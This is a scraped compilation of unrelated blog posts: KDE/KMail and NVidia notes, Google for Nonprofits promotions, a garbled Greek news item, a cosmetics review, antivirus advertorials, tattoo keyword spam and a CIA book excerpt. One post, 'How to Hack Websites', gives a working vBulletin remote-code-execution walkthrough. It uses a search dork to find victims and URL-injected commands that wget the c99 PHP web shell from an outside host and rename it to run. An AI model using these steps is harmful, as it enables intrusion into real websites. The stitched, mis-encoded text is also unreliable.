Nepomuk...one of the things that, well, so far I was always recommending for users to turn off. Slight detour here: what is Nepomuk and its relation to KMail? Nepomuk helps you to find data. It indexes all kind of data and with some queries you can find e.g every file where my name is mentioned, all email addresses from any file, etc. There is a process that goes through the akonadi data (emails, calendars, etc) and "feeds" to it for Nepomuk to be indexed. Then there are queries and code in KMail accessing Nepomuk: getting email addresses for composer's autocompletion, searching inside mail bodies, tagging your emails with custom tags, etc.
As a break we had another presentation, this time about KMail itself, what components make up KMail, how they are distributed. As far as I saw, this was less interesting to the audience, they rather looked at their computers and hacked on something. Luckily our KMail maintainer, Laurent Montel, is super active, but I wouldn't mind more contributors. Too bad he wasn't at the sprint.
We had a lunch at a nearby place, nothing extra, but the food was (again) good.
What did other do? Let's see what I can remember... Sune dreamed about crypto stuff and composite jobs. He worked on making some cryptographic code asynchronous and started to get faimiliar with kdepim code. I'd not say he picked up the easiest job.
|KMail - making it more usable|
KMail is one of the most important applications inside KDE, I think hardly can argue anybody about it. Everybody is using email, and even if some think that a webmail solution can be just as good, most of us still do what we did 10-15 years ago: download mail to our computer/phone/tablet and carry that around.
|KDE and NVidia (updated)|
The above combination was never a painless experience, still at some point in past it seemed to be better to have a NVidia card on Linux then anything else, so I continued to buy them whenever my system was upgraded. Lately although it started to make me rather bad. I have two computers, one that is a 4 core Intel CPU with 8GB of memory, the other is a Core2Duo with 3GB. The latter is a Lenovo laptop. Both have NVidia, nothing high end (Qudaro NVS something and 9300GE, both used with dual monitor setup), but they should be more than enough for desktop usage. Are they?
So in case you have similar problems, try to switch to 256.44 and if it doesn't help chose a different widget style.
Now, don't say me to use nouveau or nv. Nouveau gave me graphic artifacts and it (or KDE?) didn't remember the dual card setup. Nv failed the suspend to disk test with my machine and doesn't provide 3D acceleration needed eg. for Google Earth.
UPDATE: I upgraded my laptop to 4.5.1 (from openSUSE packages).Well, this broke composition completely, I got only black windows. I saw a new driver is available (256.53), let's try it. So far, so good, even with Oxygen. Let's see on the long run how it behaves, I didn't test it in deep.
|KDE4: is it usable for you?|
I know it is not so nice to complain and bash a project when you don't contribute to it. And yes until now, I did not contributed to the KDE4 desktop as I wished. I compiled it regularly and used the libraries, but did not run the KDE4 desktop or KDE4 version of the applications except KDevelop and Quanta.
My conclusion: as it is now, the KDE4 desktop should not be released. Luckily we have some months left until the final release, so who knows, it might really be usable. I have more confidence in the base libraries and the applications. I think there only some polish is needed, in general they should be usable, but as I said, I didn't test many of them either. But what I started up for a quick test seemed to work.
|Unlocking G Suite for Nonprofits: Improve internal workflow and communication|
Whether you have a team of five or 500 a seamless, collaborative workflow is critical in the digital age. Our goal is to make sure that your nonprofit is able to focus on changing the world by using technology to save time -- not waste it. In the digital age though, information sharing can often be complex; your team might not work in the same office, or even the same timezone. Some team members might be in an office with computer access, while others are in the field on mobile devices. Who from your team should be able to access confidential documents?
This brings us to a key question: How do you empower team members to work together towards a common goal, and use technology to enable it?
Great question. Weâd like to introduce you to G Suite - (formerly Â Google Apps for Work ). G Suite aims to help teams work together in real-time -- no matter where they are in the world.
Today, weâre spotlighting a few nonprofits to share how their teams Â are using Google tools and apps to improve workflow and internal communication.
Mercy Beyond Borders - Internal Communication with Sheets & Sites
Mercy Beyond Borders (MBB) is a U.S. nonprofit that aims to forge opportunities for women and girls in extreme poverty to learn, connect, and lead. Utilizing a small office in the U.S. as home base, MBB targets rural areas in Haiti and South Sudan. In both of these areas, cultural norms and poverty prohibit full participation of women. In fact, these areas offer minimal education and opportunities for employment, which often Â impedes the development of leadership skills or positions. Mercy Beyond Borders focuses its programs on providing trainings, scholarships, leadership camps, and business loans for women.To achieve their mission, Mercy Beyond Borders faces the challenge of balancing US-based operations with field work in remote areas like South Sudan and Haiti. Their nonprofit partners range from large organizations to local schools to individuals. So how does Mercy Beyond Borders ensure that all staff, vendors, and partners stay connected and working together in sync?
Mercy Beyond Border began using G Suite to streamline its workflow, connecting their team across the globe. Using G Suite, MBBâs team is able to access, share, and collaborate together in real-time. Take a glimpse into how they do it:
âIt [G Suite] helps to better connect, engage, and keep Board members up-to-date in between meetings, or Â if they are unable to make a meeting (in which case they can view the Meeting Archives page),â said Adrienne Perez.
MyFace - Increasing productivity and improving internal workflow by remote access
Established in 1951, MyFace was founded to address the medical, surgical and psychological needs of those living with facial deformities. The organization offers access to care and treatments --- regardless of the severity of the anomaly, the length of treatment, or the familyâs ability to afford care. In America alone, 1 in 650 children is born with an facial cleft. Every year, MyFace helps more than 1,000 patients seek treatment. Of this population, 85% are children, 70% live in poverty, and 95% require long-term care. The costs involved in this are high and verges on insurmountable for low income families. With this in mind, MyFace ensures that all children receive highest quality interdisciplinary and comprehensive reconstructive care by doctors who provide their services pro bono.
As a small nonprofit (their staff of eight including their therapy dog, Bentley), employees are required to perform a variety of different tasks. On any given day, team members might be responsible for website design, grant proposal writing, and marketing strategy. And oftentimes, what one employee starts today is Â picked up by another employee tomorrow. Because itâs often all-hands-on-deck, collaboration is particularly key for MyFace.
Our mission of changing faces and transforming lives can be fulfilled with the help of technology from G4NPCarolyn Spector Executive Director MyFace
To address their challenge, MyFace began using Google Drive to centrally store, access, and share information from anywhere at anytime. Drive helped decrease the amount of time that MyFace spends on administrative tasks, like sending documents back and forth or working with out-of-date data or information. Driveâs tools like Docs and Sheets enable the team to collaborate both in and out of office.
MyFace also deals with an overwhelming amount of data and information. The team needs this data to not only be easy to store, retrieve, and share â it needs to be secure, since it contains confidential and personal patient information. G Suite offers that as well, ensuring that all information is kept private and secure. (Want to know more about G Suite security and how safe they really are? Read more about it here).
âOur mission of changing faces and transforming lives can be fulfilled with the help of technology from G4NP because it offers invaluable resources to nonprofits of any size at no cost,â stated Carolyn Spector, Executive Director of MyFace.
Having global teams of different sizes with varying access to technology can make timely communication difficult, if not impossible. While nonprofits like Mercy Beyond Borders and myFace strive to accomplish unique missions, both organizations are passionate about changing the world. And about using the right technology to help. Utilizing tools like G Suite has been key for nonprofits like these in order to improve internal workflow and communications. For Mercy and my Face, making information shared, up-to-date, and secure has been crucial for navigating the Technology Age.
Interested in learning more about the tools available to your nonprofit? Check out our website to see how G4NP can help your nonprofit with real-time, up-to-date communication and data sharing.
To see if your nonprofit is eligible to participate, review the Google for Nonprofits eligibility guidelines. Google for Nonprofits offers organizations like yours free access to Google tools like Gmail, Google Calendar, Google Drive, Google Ad Grants, YouTube for Nonprofits and more. These tools can help you reach new donors and volunteers, work more efficiently, and tell your nonprofitâs story. Learn more and enroll here.
Footnote: Â Statements are provided by Nonprofits that received free products as part of the Google for Nonprofits program, which offers free products to qualified nonprofits.
|A nonprofit's guide to online security: So you want to learn the lingo?|
This year marks the 25th anniversary of the World Wide Web becoming publicly available. For many of us, this is a reminder of just how much the Internet has transformed our daily lives. This rings true for nonprofits too: The Internet has revolutionized the way that nonprofits communicate, fundraise, and recruit volunteers. It has enabled nonprofits like yours to share their mission with a global audience. To raise awareness. And to change the world.Â
But the power of the Internet also comes with great responsibility -- namely the need to keep information safe and secure.Â As a nonprofit, it can be difficult to keep up with online security, especially when terminology seems complicated. Yes, you might have heard of terms like âphishingâ or âcookies,â but what do they mean?
Today, you can find the answers to your questions with our quick & easy to guide to online security terminology. In less than five minutes, youâll be well on the way to helping keep your nonprofit safe on the Internet.Â
Letâs get started! Hereâs a quick guide to familiarize yourself with common lingo and learn how to distinguish terms that are friends vs foes in the online security realm.Â
THE BAD GUYS: MALICIOUS ACTIONS/TERMS
THE GOOD GUYS: ONLINE SAFETY TERMS
Thatâs a wrap for now! Pass on these tips to your nonprofit partners to stay safe and secure online, so you can focus on what matters most: changing the world.Â
To see if your nonprofit is eligible to participate, review the Google for Nonprofits eligibility guidelines. Google for Nonprofits offers organizations like yours access to Google tools like Gmail, Google Calendar, Google Drive, Google Ad Grants, YouTube for Nonprofits and more at no charge. These tools can help you reach new donors and volunteers, work more efficiently, and tell your nonprofitâs story. Learn more and enroll here.
|Four ways to keep your nonprofit safe & secure online|
For nonprofits, the Internet serves as a powerful vehicle for change â creating a way to access information, connect with users, and drive innovation. But navigating the web can also be a tricky task. Online safety and security has become increasingly pertinent for all digital users, including nonprofits. While itâs relevant to all though, itâs unattended by many. This raises the question: âHow do we keep our nonprofit (and the community we serve) safe and secure online?â
Today, weâre partnering with Googleâs User Advocacy Group to share four smart tips to keep your nonprofit, your users, and you safe online.
1. Secure your passwords
Many of us âknowâ that itâs smart to pick a strong password, but out of convenience we also continue to use our favorite petâs name (e.g. âCliffordâ) or other not-so-creative passwords like âpassword.â Although pets like Clifford are great, they donât make great passwords. Rather, this weak protection creates vulnerable access to some of your nonprofitâs most sensitive information.
Picking strong passwords that are different for each of your accounts is extremely important -- itâs also good practice to update your passwords regularly. Â Check out the following tips:Â
2. Take the security checkup
Googleâs Security Checkup is a quick, easy way to review the following information about your account (and more)!
3. Understand your privacy settings
If you do your personal and business work on the same computer, you will want to also check your privacy settings through Googleâs Privacy Checkup. Privacy Checkup allows you to control what information like photos, videos and reviews are shared to the public or to whomever you choose.
Review important information about how Google uses data to make services better for you and your nonprofit.
4. Ensure you're switching between your personal & business accounts
We understand that as a nonprofit, you wear many hats and manage multiple business accounts in addition to personal ones. Google makes it easy toggle between accounts â visit your account settings to quickly determine which data youâre accessing, and rest easy knowing your personal and business information are separate.
Online security doesnât have to be difficult. These simple steps will give you peace of mind and protect your nonprofitâs valuable work. If you have any other online security questions or want to recommend a topic for a future blog, please add a comment below.Â
To see if your nonprofit is eligible to participate, review the Google for Nonprofits eligibility guidelines. Google for Nonprofits offers organizations like yours access to Google tools like Gmail, Google Calendar, Google Drive, Google Ad Grants, YouTube for Nonprofits and more â all at no charge. These tools can help you reach new donors and volunteers, work more efficiently, and tell your nonprofitâs story. Learn more + enroll here. Â
|HAPPY 13TH BIRTHDAY, Google Ad Grants|
Happy 13th birthday, Google Ad Grants! We launched Ad Grants 13 years ago to offer nonprofits a free online advertising solution to share their causes with the world.Â
Over the years, weâve learned a lot together about what it means to be a nonprofit in the digital age. And as the industry landscape has changed, weâve aimed to ensure that AdWords consistently helps to deliver your mission online.Â
With nonprofitsâ limited time and resources in mind, we created AdWords Express to be an automated advertising solution that serves the same effective ads on Google Search as standard AdWords. AdWords Express requires less ongoing maintenance than AdWords, while still delivering an exceptional experience for Ad Grantees.Â
To see if your nonprofit is eligible to participate, review the Google for Nonprofits eligibility guidelines. Google for Nonprofits offers organizations like yours free access to Google tools like Gmail, Google Calendar, Google Drive, Google Ad Grants, YouTube for Nonprofits and more. These tools can help you reach new donors and volunteers, work more efficiently, and tell your nonprofitâs story. Learn more and enroll here.Â
|Google for Education presents: Google RISE Awards!|
Google for Education just opened applications for the Google RISE Awards, a $10-25k USD grant given to nonprofit organizations globally that give girls and underrepresented students access to computer science through extracurricular outreach programs. In 2015,Â 37 organizationsÂ from 17 countries received RISE Awards for projects ranging fromÂ programming clubsÂ in Johannesburg to workshops onÂ CS and music productionÂ in San Francisco.Â
Learning about CS promotes valuable problem solving skills that students can apply to any field of study. Unfortunately, many students have aÂ negative perceptionÂ of what CS is and who itâs for. By partnering with nonprofits that are providing students with access and exposure to CS, we hope to change this perception and encourage more students to pursue CS. Weâve been inspired by the creativity and passion weâve seen from our past RISE awardees, and this year weâre excited to expand the reach of the RISE awards by opening two rounds of funding applications for nonprofit organizations.Â
The RISE Awards are now acceptingÂ applicationsÂ through February 19, and more information on the application process is listed on ourÂ website. VisitÂ g.co/cseduÂ to learn more about Googleâs other CS resources, including our CS teacher professional development awards,Â Computer Science for High SchoolÂ (CS4HS), which is also currently acceptingÂ applicationsÂ for the 2016 year.
|KVM virtualization with Allwinner A20 on Debian: libre, low-power, low-cost||Introduction Various cheap ARM boards based on the Allwinner A20 SoC are available already for a few years. The first EOMA68 computer  will be also based on this chipset. Not many users know that the Allwinner A20 supports hardware-supported virtualization as well. Its Cortex A7 cores allow running hardware-accelerated ARM virtual machines (guests) using Read more »|
|Backing up and restoring data on Android devices directly via USB (Howto)||Motivation I was looking for a simple way to backup data on Android devices directly to a device running GNU/Linux connected over a USB cable (in my case, a desktop computer). Is this really so unique that it’s worth writing a new article about it? Well, in my case, I did not want to buffer Read more »|
|Î Î¡ÏÏÎ¯Î± ÏÏÎ¿ÏÎ¸ÎµÎ¯ Î½ÏÎ¼Î¿ Î±ÏÎ±Î³ÏÏÎµÏ ÏÎ·Ï ÏÏÎ½ proxies, Tor ÎºÎ±Î¹ VPNs|
Î£ÏÎ¼ÏÏÎ½Î± Î¼Îµ ÏÎ¿ Bleeping Computer ÏÎ± Î´ÏÎ¿ Î½Î¿Î¼Î¿Î¸ÎµÏÎ¹ÎºÎ¬ ÏÏÎ¼Î±ÏÎ± ÏÎ·Ï Î¡ÏÏÎ¯Î±Ï, ÎµÎ½ÎÎºÏÎ¹Î½Î±Î½ ÎºÎ±Î¹ ÏÏÎ¿ÏÎ¸Î·ÏÎ±Î½ ÏÏÎ¿ Î³ÏÎ±ÏÎµÎ¯Î¿ ÏÎ¿Ï ÏÏÎ¿ÎÎ´ÏÎ¿Ï Î Î¿ÏÏÎ¹Î½, Î½Î¿Î¼Î¿ÏÏÎÎ´Î¹Î¿ ÏÎ¿Ï Î±ÏÎ±Î³Î¿ÏÎµÏÎµÎ¹ ÏÎ·Î½ ÏÏÎ®ÏÎ· proxies, Tor ÎºÎ±Î¹ VPNs, Î±ÏÏ ÏÎ¿Ï Ï ÏÏÎ®ÏÏÎµÏ ÏÏÎ·Î½ ÏÏÏÎ±. Î ÎÎ³ÎºÏÎ¹ÏÎ· ÏÎ¿Ï ÎÎ³Î¹Î½Îµ ÏÎ±ÏÎ¬ ÏÎ¹Ï ÎÎ½ÏÎ¿Î½ÎµÏ Î´Î¹Î±Î´Î·Î»ÏÏÎµÎ¹Ï Ï ÏÎÏ ÏÎ¿Ï ÎµÎ»ÎÏ Î¸ÎµÏÎ¿Ï Internet ÏÎ·Î½ ÏÏÏÎ±.
ÎÎ¹ ÏÎ¬ÏÎ¿ÏÎ¿Î¹ Internet ÏÎ·Ï Î¡ÏÏÎ¯Î±Ï Ï ÏÎ¿ÏÏÎµÎ¿ÏÎ½ÏÎ±Î¹ Î½Î± ÎµÏÎ¹Î²Î¬Î»Î¿Ï Î½ ÏÎ·Î½ ÏÎ»Î®ÏÎ· Î±ÏÎ±Î³ÏÏÎµÏ ÏÎ· ÏÏÎ®ÏÎ·Ï ÏÎ»ÏÎ½ ÏÏÎ½ ÏÏÏÏÏÎ½ ÏÎ±ÏÎ¬ÎºÎ±Î¼ÏÎ·Ï ÏÏÎ½ ÏÎµÏÎ¹Î¿ÏÎ¹ÏÎ¼ÏÎ½ ÏÎ·Ï ÏÏÏÏÎ²Î±ÏÎ·Ï ÏÎµÏÎ¹ÎµÏÎ¿Î¼ÎÎ½Î¿Ï , ÏÎ¿Ï ÎÏÎµÎ¹ Î³Î¯Î½ÎµÎ¹ Î¼Îµ ÎºÏÎ±ÏÎ¹ÎºÎ® ÎµÎ½ÏÎ¿Î»Î®.
ÎÎ½ ÏÎµÎ»Î¹ÎºÎ¬ ÏÎµÏÎ¬ÏÎµÎ¹ ÏÎ±Î½ Î½ÏÎ¼Î¿Ï, ÏÏÏÎµ Î· Î¡ÏÏÎ¯Î± Î¸Î± Î³Î¯Î½ÎµÎ¹ Î· ÏÏÏÏÎ· ÏÏÏÎ± ÏÎ¿Ï Î¸Î± ÎµÏÎ¹Î²Î¬Î»ÎµÎ¹ ÎµÏÎ¯ÏÎ·Î¼Î· Î±ÏÎ±Î³ÏÏÎµÏ ÏÎ· proxies, Tor ÎºÎ±Î¹ VPNs.
|Comment: Artificial intelligence is coming, ready or not||The other day, I got into a discussion about singularity and artificial intelligence with a computer science student. He's young, smart and full of ...|
|Review: Laneige Water Bank Eye Gel|
This is my second post on my purchase from Althea. Other than the Missha Red Ginseng Sheet Mask, I also bought Laneige Water Bank Eye Gel. Eye bags and dark eye circles runs in the family. So whenever I do not have enough sleep, my eye bags and dark circles become more apparent. I have always wanted to buy a good eye cream while I was schooling but couldn't really afford because you know how expensive eye cream can be. So once I got my first paid I decide to get one. My first ever eye cream is Laneige Water Bank Eye Gel which is from Laneige Water Bank series.
The gel/cream is slightly translucent and light. It is also really light and not sticky. When applied, it gives a slightly cooling sensation on your eye area. I am really impressed by how detailed the instruction booklet is. I always try to follow the instruction unless I am really tired.
So what is my verdict? I think the gel really helps to make my eyes feel less tired after spending a whole in front of the computer at work. I could really feel the effects when I first apply it. My eyes felt less heavy the next day. However, I feel it doesn't really help to lighten my dark eye circles and it only help to my eyes become less puffy by slightly. Perhaps because my eyes isn't very puffy initially. I tried using the cream on my mother who had really puffy eyes and it showed some visible effects! I can give inputs on its moisturizing function because my eyes' area are never dry in the first place.
I'll give this product 4/5.
|USA's Mr. Robot's Revolution will be Televised. But You Still Should Not Watch It.|
This weekâs episode of USAâs Mr. Robot saw the computer-hacker, techno-geek drama finally get over its mid-season identity crisis, and get back to its obvious intended purpose: glorifying cyber revolution for the purpose of mass income redistribution.
|Malware: How we are Infected [InfoGraphic]|
So you have a computer, but if it was infected with a virus, what would you do? Would you even know it was there? It is a well-known fact that over 32% of all computers in the world have malware of some sort. Today we will be talking about the infamous computer virus and what it is.
So let's start with something you all have probably heard of, Malware. Malware is a program made to infiltrate your computer, disable parts of it, and thus gain access to your hard drive, search history and such to aid with stealing information. However, there are other types of malware out there. Let's get to know them and how much of the 32% they infect.
At 57%, first we have the virus. This is a software that has the capability to copy itself and send itself into other folders. Then there is the "Trojan" at 21%. The Trojan is malicious software that hides on the internet disguised as some sort of program or free item, and ce you download it, you will soon discover it is malicious. But the Trojan has a brother at 7%, called the "Trojan Downloader". This type of virus does the same thing as the simple Trojan, but once on your computer it downloads more viruses and software, then begins to use those programs.
Then at 3% there is the "Exploit", which finds a glitch, bug or system error and uses that to hack into your computer. Next we have the "Worm" at 2%, this malicious bug works the same as a Trojan, but then copies and pastes itself across your computer network.
But not all viruses seem so bad when you get them, for instance the "Adware" at 3%. This type of virus infects your computer so nothing happens at first, but once you log into your web browser, then immediately your screen will be flooded with ads. There is also the "Monitoring Tool" with 2% of the 32% infected. This malware infects your computer and hides, not doing anything but monitoring your activity, (Search history, keyboard history etc.) and then sends those back to a remote server.
There is also one of the worst at 1%, the "Back Door". This virus infects your computer remotely, not allowing your anti-virus security to even detect it, but sure enough it does. And lastly we have one of the worst but luckily at a low percentage of 0.01%, "Spyware". This diabolically designed software infects your computer and takes the most important pieces of information it can find and sends it back to wherever it came from. This information is generally passwords, credit card numbers and other sensitive information.
All of these viruses have devastating effects. Last year there were 27 million strains of malware made, which means 74,000 new viruses are created every day. The number of homes in the United States that experience spam is 24 million. The number of homes with serious viruses in the last 2 years is 16 million, and the number of houses that had spyware in the last 6 months is 6 million. But most devastating of all, over 1 million of all homes have lost money to spyware in the last year. Another devastating fact is that Viruses cost the world 4.55 billion USD every year.
So be safe, don't download anything you are unsure of, and be sure to have an anti-virus software. But most importantly learn how to detect these programs when you get them.
|WhatsApp spam used by ASProx Botnet to Deliver Kuluoz Malware|
Photo by: Sean MacEntee
As you probably know, Facebook bought WhatsApp for an obscene amount of money in stock earlier this year. What you might not know is that there's a lot of WhatsApp spam that is being used by ASProx Botnet to deliver nasty Kuluoz malware to unsuspecting users. This is not good news any way you look at the situation. Keep reading if you want to know more about this as well as what you should do to stay safe.
Here's a look at some of the dates when the WhatsApp problem has made Malcovery's "Today's Top Threats" list.
Looking at that list, it's easy to start wondering why nothing has been done sooner about the problem. Additionally, it really makes you wonder why Facebook paid so much for the company by offering them stock options.
Going back to November of last year, ComputerWorld published an article about how WhatsApp was one of the top five brands imitated to deliver malware with spam. That's quite a bit of recognition - and not in a good way.
Here's a look at some specific ways you can stay safe and avoid Kuluoz and other malware.
Following the advice above, there's a good chance you'll be able to avoid WhatsApp spam and not get infected with Kuluoz malware. Still, it's a good idea to pay attention and update your anti-virus software all the time. If you have any experience with WhatsApp that's negative, please leave us a comment below.
Guest Post -
Written by: Jenny Corteza deals with staff outsourcing all the time. She's a writer and dealing with editors and others can sometimes be a problem. Still, she loves writing articles about technology. Go figure.
|What is Remote Code Execution? How to Hack Websites|
According to Wikipedia, Remote Code Execution can be defined as âIn computer security, arbitrary code execution or remote code execution is used to describe an attacker's ability to execute any commands of the attacker's choice on a target machine or in a target process. It is commonly used in arbitrary code execution vulnerability to describe a software bug that gives an attacker a way to execute arbitrary code. A program that is designed to exploit such vulnerability is called an arbitrary code execution exploit. Most of these vulnerabilities allow the execution of machine code and most exploits therefore inject and execute shell code to give an attacker an easy way to manually run arbitrary commands. The ability to trigger arbitrary code execution from one machine on another (especially via a wide-area network such as the Internet) is often referred to as remote code executionâ
vBulletin RCE Injection
Few websites running vBulletin are vulnerable to Remote Code Execution, by exploiting the vulnerability we can get our PHP backdoor shell uploaded on the website. Weâll use a dork to find the vulnerable website.
Note: Donât keep yourself restricted when it comes to using dorks, use other search engines too other than Google, like Bing, Yahoo etc. Use of multiple search engines will help you to get more vulnerable websites.
Dork: inurl:faq.php & intext:"Warning: system() [function.system]"
Now, select any website of your choice from th search result, and go to its faq.php page. If the website is vulnerable, you will get the following on the page.
You will get an error similar to Warning: system() [function.system]: Cannot execute a blank command in [path]/faq.php(324) : eval()'d code on line 1
So, firstly upload your PHP shell on any free hosting website or you can use sh3ll.org/c99.txt as it has already got an uploaded .txt shell. (We will be first uploading our shell in .txt form, and later will be changing the extension to .php after the upload process is completed.
Suppose the vulnerable website is http://www.vulnerable.com/faq.php. So in order to upload our shell enter the following in the URL bar:
http://www.vulnerable.com/faq.php?cmd=cd /tmp;wget http://sh3ll.org/c99.txt
To check if we were able to successfully upload our shell, enter the following in the URL bar
http://www.vulnerable.com/faq.php?cmd=cd /tmp;ls -la c99.txt
Were c99.txt is the name of your uploaded shell. If we were successful in uploading our shell, we see the following text on the page. (Might be a little different in some cases)
-rw-rârâ1 nobody nobody
We know that our shell is successful uploaded on the website, now itâs time to change the file format from .txt to .php in order to execute it on the server.
http://www.vulnerable.com/faq.php?cmd=cd /tmp;mv c99.txt check.php
(You can change check.php to any other name of your choice)
Now, the file format is change. Itâs time to execute our shell, so to execute it enter the following in the URL bar
http://www.vulnerable.com/faq.php?cmd=cd /tmp;mv c99.txt check.php
Bingo!! We successfully exploited vBulletin Remote Code Execution Vulnerability.
|Technology and it's threat|
Technology and its threat
It's true that technology makes everyone dance on its tone. Now we have computers with the help of which we can get information about everything. It has also changed the way of communication. Earlier we use to talk via letters and phones. But, now we have a webcam through which we can do video calling or conferencing. It's true that machines have been created by men, but they make fewer mistakes as compared to men. You just need to program the computer properly and it will work accurately. With the help of computer everything is done perfectly in less time. Now days itâs not surprising if students carry their laptop and mobile to school. Technology has truly made our lives easier.
But a computer also faces health issues, which can be treated by an Antivirus Software program.
Following are top 8 threats and no one should ever ignore them
Viruses: - The name itself describes it. It can disrupt a computer and can damage the available data. Viruses can be received via numerous options that also include e-mail attachments. So, always beware when you get an e-mail from an unidentified server or person.
Spyware: - A Spyware is used to spy on computers. It can steal your personal information and send it to others who can misuse it. Today everyone is concerned about being the victim of identity theft. Spyware are generally attached to a freeware downloaded from the web. So be cautious when downloading and installing a software tool.
Spam: - Spam mails are promotional in nature and usually promote products of sexual or dubious nature. Some websites are harvested by spammers, from where they steal your e-mail ids.
Adware: - Adware are responsible for producing advertisements on a system without userâs consent, which you often see on your computer screen. It can be in the form of pop-ups, pop-under, and other sources. People generally do get irritated by these adware but at many times are not aware of its causes.
Dialers: - Dialers are the programs, which are designed to redirect phone calls to expensive numbers without even informing you. Youâll get to know about it, when you will receive the bill.
Hackers: - A computer always consists of so much personal data, including your bank and credit card details. Hackers always try to steal this data and recover your passwords in order to do malicious activities and even may burgle you.
Hijackers: - The hijackers take remote control of your computer screen and can reset your homepage and search pages. They do it in order to do thievery on your behalf so that they can be away from the agencies and youâll be in danger.
Phishing: - Phishing has become the most threat full of all malicious activities over the internet. It is because Phishing websites look similar to the real websites, and are designed to make fools out of the customer and are generally scams to harvest usernames and passwords of prominent websites.
In order to be away from these 8 threats, download Security Software Optimo Defender, which also scans for threats and performs virus removal programs on a computer by offering various features like Antivirus,
Anti-Trojan, Anti-Spyware, and System Security Suite. There are a lot of Antivirus programs available on the internet, but like everything else they also vary in quality. You tend to get what you pay for.
Anna Asthesia is chief technical head in optimodefender.com & working from last 5 years. She likes to write article on antivirus software program, security software & how to find genuine online tech support for Laptops, Computers & Smartphones.
About the Author
Anna Asthesia is chief technial head in optimopro.com & working from last 5 years. She likes to write article on windows registry , computer problems & how to find genuine online tech support for Laptops, Computers & Smartphones.You can read her latest blogs onblog.optimopro.com
|How To Speed Up Your Computer with Optimo Pro|
Computer users are inundated with tribulations frequently. The way you eat food to keep you going and to keep you fit, likewise, computer machine also needs maintenance every now and then. Your body demands food to keep you going. So how can your computer lag behind? Computer optimization is the buzz word. Everyone wants to speed up computer to reap more benefits.
Regular holdups that stall the computerâs performance become a complete nuisance. Virus attacks, malware intrusions, Trojan horse, and other cruel problems slow down the speed of your system. But most of the users find it difficult to understand the problem and resolve them. What you require is good quality pc cleaner that deals with junk files, registry errors and much more.
Quite a few PC cleaners are doing the rounds in the market, some fake and some real. Fake ones rather than solving any setback embed a set of virus and infections that results in loss of time and money. Real ones effectively optimize your computer system that helps speed up computer.
Optimo Pro is software that comes with more than one program. They scan the computer within minutes and help the customer get back to work. Within months of its launch, Optimo Pro has had immense outreach and has helped computer users, be it consumers or business. The increased usage of Optimo Pro has been phenomenal.
What all it does?
All these apps work in tandem with each other and help increase the speed of your PC. A PC cleaner acts a scrubber that scrubs manifold parts of the computer and helps keep it in good shape. Be it fixing your registry or cleaning junk files, it does all.
With the kind of success Optimo Pro has gathered, it becomes worthwhile to at least give it a try. Download Optimo Pro from www.optimopro.com and make use of the trial version. Our customer service number is 1-800-413-1289. You can ask any question and we will be more than happy to serve you.
About the Author
Anna Asthesia is chief technial head in optimopro.com & working from last 5 years. She likes to write article on windows registry , computer problems & how to find genuine online tech support for Laptops, Computers & Smartphones.You can read her latest blogs on blog.optimopro.com
|Basics Of Wi-Fi Security|
Hi all today i am just going to discuss how you can secure your wifi network from hackers. you must have came across many tips on securing wifi network from various blogs and all but here we will discuss from a hackers point of view and all practical and genuine approach to securing Wi-Fi network so lets begin.
|How to transfer your contacts/message/pictures/music/video from pc to iPhone||If you have been using an iPhone for some time now, you would be pretty familiar with the fact that the transference of data between your iPhone and your computer is very important due to a number of different reasons. You often need to transfer your contacts, messages, pictures, music & videos from your PC […]|
|meaningful tattoo quotes small|
tattooed on her shoulder
letter tattoo on shoulder
tattooed on her shoulder
meaningful tattoo quotes small
meaningful tattoo sayings for women
meaningful tattoo quotes small
tattoo cross designs for women
meaningful tattoo quotes small
meaningful tattoo quotes small
heart and star tattoo designs
meaningful tattoo quotes small
meaningful tattoo quotes small
meaningful tattoo quotes small
meaningful tattoo quotes small
meaningful tattoo quotes small
oni mask tattoo designs
meaningful tattoo quotes small
love quote tattoos
meaningful tattoo quotes small
small tattoo ideas
meaningful tattoo quotes small
oni mask tattoo designs
meaningful tattoo quotes small
tattoo font styles
meaningful tattoo quotes small
pictures of tattoos with sayings
meaningful tattoo quotes small
love quote tattoos
meaningful tattoo quotes small
arm tattoo ideas for men
meaningful tattoo quotes small
letter tattoo on shoulder
meaningful tattoo quotes small
tattoo cross designs for women
meaningful tattoo quotes small
arm tattoo ideas for men
meaningful tattoo quotes small
meaningful tattoo sayings for women
meaningful tattoo quotes small
meaningful tattoo quotes small
blog entry 197blog entry 35
meaningful tattoo quotes small
tattoo for forearm
|Burn After Reading|
In the World of CIA Fronts, Partners, Proprietaries & Contractors
The Almost Classified Guide to CIA Front Companies, Proprietaries & Contractors
By WAYNE MADSEN
Cool Justice Editor's Note: Following are excerpts from author Madsen's introduction and the body of the work. Additional suggested reading: News story about Madsen's book via the Washington, D.C. based Justice Integrity Project [link at the bottom of this post].
From the Introduction
One of the most pervasive uses of companies as intelligence partners was under the CIAâs Operation MOCKINGBIRD. During the Cold War, the CIA, often with the approval of corporate executives, infiltrated their agents to work as journalists in newspapers, radio and television networks, wire services, and magazines. The following pages in this book are rife with examples of this penetration of the Fourth Estate â all too many in the opinion of this journalist. The CIA admitted to at least 400 journalists on the agencyâs payroll at the height of MOCKINGBIRD. The CIA traditionally understates its capabilities, especially when its covert activities become publicly known. Moreover, the end of the Cold War did not stop the practice of the CIA in infiltrating the media and slant news reports to its wishes.
An insightful look behind the veils of secrecy into the CIAâs use of fronts, proprietaries, and partners calls into question the purpose of the CIA. Created by President Harry S Truman to serve as a central collector and repository of intelligence, the CIA became much more than that. A few weeks after the United States witnessed the assassination of President Kennedy in the middle of downtown Dallas, Truman penned an op-ed piece that appeared in several newspapers around the country. In it, Truman shared his regret for having created the CIA in 1947:
âI think it has become necessary to take another look at the purpose and operations of our Central Intelligence AgencyâCIA . . . For some time I have been disturbed by the way CIA has been diverted from its original assignment. It has become an operational and at times a policy-making arm of the Government. This has led to trouble and may have compounded our difficulties in several explosive areas.
"I never had any thought that when I set up the CIA that it would be injected into peacetime cloak and dagger operations. Some of the complications and embarrassment I think we have experienced are in part attributable to the fact that this quiet intelligence arm of the President has been so removed from its intended role that it is being interpreted as a symbol of sinister and mysterious foreign intrigue.â
The 21st centuryâs CIAâs partners are more likely to be found among high-tech companies marketing the latest and greatest mobile applications and data mining programs than among banks, law offices, and advertising agencies. However, in the post-World War II era, the CIAâs top and middle echelons were normally found operating through cover as typewriter-pecking journalists, traveling Madison Avenue admen, corporate lawyers, and chain-smoking oilmen. In the 1970s and 80s, CIA contractors and partners began showing up in the high-tech field, with database, local area networking, and on-line information retrieval systems attracting the most interest by Langley.
